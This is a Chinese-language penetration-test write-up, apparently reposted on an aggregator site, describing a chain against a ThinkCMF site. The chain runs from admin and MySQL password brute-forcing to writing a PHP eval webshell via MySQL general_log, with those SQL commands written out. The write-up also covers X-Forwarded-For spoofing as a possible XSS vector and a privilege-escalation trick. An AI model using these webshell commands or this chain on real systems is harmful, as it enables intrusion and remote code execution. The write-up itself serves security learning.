前言

前不久的一次授權測試中，感覺缺少任何一步都無法達到getshell的目的,單個漏洞看得話確實平平無奇，但是如果組合起來的話也許會有意想不到的化學效應。

【學習資料】

前期測試

拿到這個站的時候一眼就看見了會員登錄界面,一開始想著注冊，但是覺得會員功能應該很少，沒驗證碼啥的，萬一后臺管理員也是會員呢那豈不是要是爆破出來了可以去后臺嘗試一波。

顯示的是手機號登錄，但是可以嘗試下admin,千萬不要被他的前臺迷惑了。很巧的是可以進行用戶名枚舉，而且還存在admin賬號,不爆破都對不起他

字典呢用的是鴨王的字典,爆破神器，用這個字典爆破出來過不少站點(https://github.com/TheKingOfDuck/fuzzDicts), 這次也很幸運，爆破出來了

拿到后臺去登錄下,管理員確實喜歡采用同樣的密碼，登錄進去了。看到后臺可以自定義上傳的后綴心里想可以愉快的交差了，增加后綴php,找上傳一條龍getshell。

當我看到上傳圖片的編輯器的時候我感覺事情并不是那么簡單,果不其然那個增加后綴不起作用


后臺發現是thinkcmf建站系統，網上搜索能利用的漏洞,看到一個漏洞集合(https://www.hacking8.com/bug-web/ThinkCMS/ThinkCMF%E6%BC%8F%E6%B4%9E%E5%85%A8%E9%9B%86%E5%92%8C.html) 挨個去嘗試下無果，繼續搜索(https://www.freebuf.com/vuls/217586.html), 基本上能嘗試的都payload都試了試,應該是版本高漏洞修復了或者利用方式不太對，反正是沒利用成功。有的方法對網站有破壞性，我要是試了不得被打死呀。既然到現在無法getshell,那就嘗試找找漏洞吧，領導說的好如果無法getshell就多找漏洞，聽領導的總沒有錯。

進階階段

在一開始打開網站的時候，由于安裝了谷歌插件sensinfor(t00ls上發現的)，可以初步探測網站的敏感目錄，比如備份文件，phpmyadmin,phpinfo等等，在一開始就探測出存在phpinfo，獲取了網站的絕對路徑

常規用nmap探測下開放的端口，發現對外開放了3306端口，有絕對路徑了，不抱希望的去爆破下3306吧，反正我是沒爆破出幾個3306的密碼，用下超級弱口令檢查工具,字典接著用鴨王的吧，誰知道是字典強大還是運氣爆破，話說這個不算弱口令，只能說字典里有這個密碼吧，只要字典存在的就是弱密碼，沒有錯。

接下來就是常規操作了，試下log寫日志吧

show variables like '%general%'; 查看日志狀態 SET GLOBAL general_log='on' 開啟日志讀寫 SET GLOBAL general_log_file='xxx.php' 指定日志路徑 SELECT '<?php eval($_POST["cmd"]);?>' 寫日志進xxx.php

其他漏洞

基于負責任的態度也發現了 一些其他的漏洞，不過相對來說危害性不大吧,但是如果在寫測試報告的時候如果沒得寫也是可以寫上的。

登錄IP偽造

這個后臺一般都有記錄用戶登錄IP的習慣，但是如果記錄IP的時候選取的是x-forward-for構造的IP,這樣攻擊者是可以偽造登錄IP的,如果沒有對IP的合法性進行校驗，構造一個XSS payload觸發存儲型XSS這也不是沒可能,在測試的時候就遇到過幾次，后臺記錄會員登錄IP的地方存在存儲型XSS

不過這里美中不足的是后臺對IP的合法性進行了校驗，如果是不合法的IP會被重置為0.0.0.0

越權漏洞

登錄后發現管理員沒辦法對自己進行操作，這很尷尬,管理員都沒辦法更改自己的信息

很簡單的辦法隨便找個可以進行更改的鏈接，更改url實現修改管理員信息,按照經驗這種限制管理員更改自己信息的情況我遇到的很多都是前端限制了。

然后會彈出詳情頁面，可以進行修改操作,這里修改下會員等級把自己從普通會員變成VIP吧，一個管理員怎么能是普通會員呢

總結

細看下來真的沒啥技術含量，運氣好爆破出來了，可以寫log日志，但是也算是一環扣一環吧，如果不是一開始爆破出來了可能也沒想著去爆破3306，如果沒有絕對路徑的話我也懶得去爆破3306，測試中運氣也很重要呀，哈哈。

持續更新↓↓↓↓

【網絡安全學習資料·攻略】

總結

以上是生活随笔為你收集整理的【网络安全】一次授权的渗透测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。